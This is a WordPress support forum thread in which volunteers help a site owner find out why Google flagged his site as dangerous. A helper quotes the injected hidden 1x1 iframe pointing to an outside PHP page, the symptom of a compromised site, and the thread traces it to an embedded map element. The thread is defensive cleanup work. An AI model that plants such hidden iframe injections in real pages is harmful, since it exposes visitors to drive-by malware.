Virus within wp

  • Hi!

    Google.de has indicated my site (cjd-update.info) that it would be dangerous for visitors. Unfortunately it is quite right. A friend find out that “something” tries to activate java applications on his IE and Vista. I myself use Apple and get no warnings. I guess the evel commes from a plugin. But how can I find out from witch one? For the time beeing the site is but in the maintenance mode. A help would be great.

    Thank you

Viewing 15 replies - 1 through 15 (of 15 total)

  • you look at the files ..

    your site isnt even cached in google, so i cant even look at the cached site, and you just said its in maintenence mode.

    what else can you do?

    https://web.archive.org/web/20070517185830/https://www.onlzoberurff.info/

    you have a script running that picking up ips and operating systems. depending on what sort of javascript is being used, that may very well be what’s causing it.

    nobody really needs to know that anyway, do they? I already know what my ip and os is — i dont need you tell me.

    Thread Starter Wukung

    (@wukung)

    sorry, NOW the site is available: https://cjd-update.info

    Here the entry at google.de:

    https://www.google.de/search?q=cjd-update&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:de:official&client=firefox-a

    I search for an idea how to find out the evil source…

    I saw the entry on google.com, thanks. In english. Had I not, I wouldnt have been able to tell you that google isnt caching your site.

    SOMETHING on your site is contacting or attempting to contact localhost — which for your readers is THEIR box. I brought up your site from a shell using lynx and saw it quite clearly.

    near the bottom:

    <iframe src="https://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    theres your problem. actually, thats not the problem, but its your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

    Thread Starter Wukung

    (@wukung)

    Now I have changed the only one file I know where “Localhost” is a matter. I deleted define(‘ENABLE_CACHE’, true); from the wp-config.php. Have you an idea what that SOMETHING could be?

    Thank you!!

    my last reply was caught by the forum as spam –

    near the bottom:

    <iframe src="https://www.nanoy.org/se.php?id=191" width=1 height=1></iframe>

    theres your problem. actually, thats not the problem, but its your symptom.

    your site has been compromised. check your permissions:

    directories: 755
    files: 644

    leaving wp-content and the theme directories open for editing is a security risk.

    Thread Starter Wukung

    (@wukung)

    It seems the plugin SHARE THIS was the foul source. Could you please be so kind and check with your shell? THANKS

    see Whooami’s last 2 replies (they were caught in moderation, I just released them)

    i looked – it might have been inside that plugin .. dunno I really doubt that alex king is letting people download plugins with exploits in the code. Isnt that his plugin?

    I just downloaded the Share This plugin from Alex’s site and don’t see any iframe in there.

    yeah i looked too, didnt see it ..in this guys page source, the iframe was immediately before the closing body tag and after the last <!-- Share This END -->

    Thread Starter Wukung

    (@wukung)

    I checked the permissions. But they are ok (755). Nevertheless, thank you for the idea. It seems to be settled…

    You have a mystery iframe just below:
    “Der Weg nach Oberurff”
    and above “Links”.
    Something in that map thing. I used wget to grab the source and there it is. Using linx I too saw that reference to localhost.

    Thread Starter Wukung

    (@wukung)

    Thank you very much. I will delete that link at once. Besides your hint I was already thinking that could be the troublemaker. THANKS!

Viewing 15 replies - 1 through 15 (of 15 total)
  • The topic ‘Virus within wp’ is closed to new replies.